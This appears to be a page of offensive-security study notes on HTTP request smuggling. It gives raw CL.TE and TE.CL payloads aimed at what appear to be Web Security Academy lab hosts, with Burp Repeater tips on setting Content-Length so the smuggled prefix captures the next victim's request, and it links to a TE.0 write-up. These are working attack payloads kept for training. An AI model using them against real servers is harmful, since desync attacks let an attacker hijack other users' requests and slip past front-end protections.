HTTP Request Smuggling

Bypass, XSS and more

CL.TE

POST / HTTP/1.1
Host: 0aa9006c0356f4eac12f806b00d70072.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: x

Note: Content Length is auto-computed by Burp (in orange)

TE.CL

POST / HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

9e
GET /404 HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0


There are two ENTERS after final 0!

Spot two enters on line 16 to end chunked request. Disable content Length computation in Burp Repeater settings.

The first Content-Length has 4bytes just to express chunked size (on line 7, chunked bytes are computed from the orange part).

The second Content-Length which is slightly above, what is required from its data, to override next coming victim's request.

TE.0 PoC

https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/

PreviousDjango ORM Exploitation NextServer Side Template Injection (SSTI)

Last updated 1 year ago

hashtagCL.TE

hashtagTE.CL

hashtagTE.0 PoC

CL.TE

TE.CL

TE.0 PoC